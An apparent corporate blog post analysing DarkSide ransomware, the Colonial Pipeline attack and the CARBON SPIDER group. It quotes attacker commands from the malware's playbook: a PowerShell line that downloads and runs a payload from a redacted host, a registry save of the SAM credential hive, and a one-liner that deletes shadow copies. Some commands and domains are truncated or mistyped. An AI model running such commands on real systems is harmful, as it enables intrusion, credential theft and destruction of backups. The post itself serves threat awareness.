Shedding Light on DarkSide

  • Press

David Knife
May 21, 2021 177 views

Hacker infecting a secure system

The Malware

We’ve all heard the term “ransomware” before, but in case you haven’t, here is a little primer. In plain English, ransomware is a type of malware that infects the victim’s computer and attempts to have them pay a “ransom” to use it again. Typically, the victim’s files are encrypted so they cannot be read, then the victim is forced to contact the organization responsible for paying the ransom. Most of the time, the files are never recovered.

DarkSide is a type of ransomware attack that was first seen in 2020. Once it infects a network, the ransomware is not concerned with being stealthy; instead, it moves laterally, exfiltrating any unencrypted data as it progresses. It terminates selected processes while avoiding some like Team Viewer. Team Viewer allows for secure remote access to the system and runs in the background. See below for technical details.

The victim will also have a custom extension created with a custom checksum of the Media Access Controller (MAC) address. Each executable is customized and will include a personalized “Welcome to Dark” ransom note, including the amount of the stolen data, the type of data, and a link to their data on the data leak site. Currently, the ransomware encryption is unbreakable, and there is no way to recover files for free.

The Pipeline

At this time, investigators from several states, local, and federal law enforcement are restricting information about the hack of Colonial Pipeline. The Federal Bureau of Investigation (FBI) has confirmed the use of the DarkSide RaaS ransomware by a Russian-speaking threat group. Data does suggest that the group behind the attack shares the same techniques, tactics, and protocols  (TTPs) as the DarkSide actors.

The Group

Since 2016 the threat group CARBON SPIDER has used various remote access trojans (RATs) to enable continued access to networks and systems. During this time, the group gained some notoriety using low-volume phishing attacks on corporations. The adversaries tool bag included the Sekur implant (aka Anunak), which has been used since 2016, and the Harpy (aka Griffon) backdoor has been used from 2018 through 2020. CARBON SPIDER uses Cobalt Strike extensively for lateral movement, as well as post-exploitation tools like PowerSPloit.

In April 2020, the group shifted focus away from narrow campaigns to operations attempting to infect many victims across all areas of business. The goal of these campaigns was to deliver REvil ransomware, which intelligence sources suggest they obtained from the ransomware-as-a-service (RaaS) vendor PUNCHY SPIDER. It is likely the group shifted targets because of the COVID-19 pandemic. Typically, the group infects a DC first before exfiltrating data and deploying ransomware.

In August 2020, the group introduced its own ransomware, DarkSide. The adversary began deploying DarkSide, likely to avoid sharing profits with PINCHY SPIDER. In November of 2020, the group took another step to using RaaS by allowing other actors to use DarkSide while paying a cut.

Technical Details

After gaining an initial foothold in the target network, the attackers begin the information gathering phase about the company and environment. If the profile reflects one of the group’s “prohibited targets,” they will abandon the attack research suggests. If not, the attackers move forward.

They collect files, credentials, and other sensitive information and exfiltrate the data. The attackers use PowerShell to download the DarkSide binary as “update.exe” using the “DownloadFile” command while abusing the Certutil.exe and Bitsadmin.exe services.

            C:\> Powershell -Command”(New-Object Net.WebClient).DownloadFile(‘hxxp://IP-REDACTED/update.exe’,’C:\Windows\update.exe”

The attacker also creates a shared folder on the infected machine and uses PowerShell to download a copy there.

After downloading the malware to the target, the adversary begins to move laterally through the network to compromise a domain controller. Once this is accomplished, they continue to collect and exfiltrate data of a sensitive nature. Including the SAM hive from the domain controller:

C:\> “C:\Windows\system32\reg.exe” save HKLM\

Once the malware has been downloaded to the domain controller using shared folders, the attacker creates a scheduled task called “Test1” configured to execute the ransomware.

DarkSide then disables the following services:

VSS, SQL, svc, memtas, mepocs, Sophos, veeam, and backup.

It then creates a connection to its command and control (C2) server, and data analysis shows the following domains were present: temisleyes[.] and catsdegree[.]com.

DarkSide uninstalls the Volume Shadow Copy Service (VSS), then deletes the shadow copies by launching an obfuscated PowerShell script that uses WMI to delete them:

Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_Delete();}

It then enumerates the running processes and terminates different ones to unlock their file to both steal related information and encrypt them.

The ransomware encrypts data utilizing a SALSA20 key to encrypt files, and the key is then encrypted with a public RSA-1024 bit key included in the executable. Reverse engineering the code, the malware doesn’t encrypt files belonging to several installed language groups: Russian-419, Ukrainian-422, Georgian-437, Tajik-428, and many more.

More Stories

  • How To Up Your Communications Game

    Jessica Pedelty
    June 8, 2021

    Celebrate Effective Communications Month by enhancing your communication skills and understanding the evolution of communication. With greater communication comes greater synergy between teams which leads to improved performance.

  • Another Day, Another Contract!

    Zara Ikram
    April 16, 2021

    The Centers for Medicare & Medicaid Services (CMS) awarded Softrams a 5-year contract to provide software services to support the Durable Medical Equipment, Prosthetics, Orthotics & Supplies (DMEPOS) competitive bidding system (DBidS).

  • Looking for the Ts for A teams

    Looking for the Ts for A teams

    Murali M
    September 24, 2020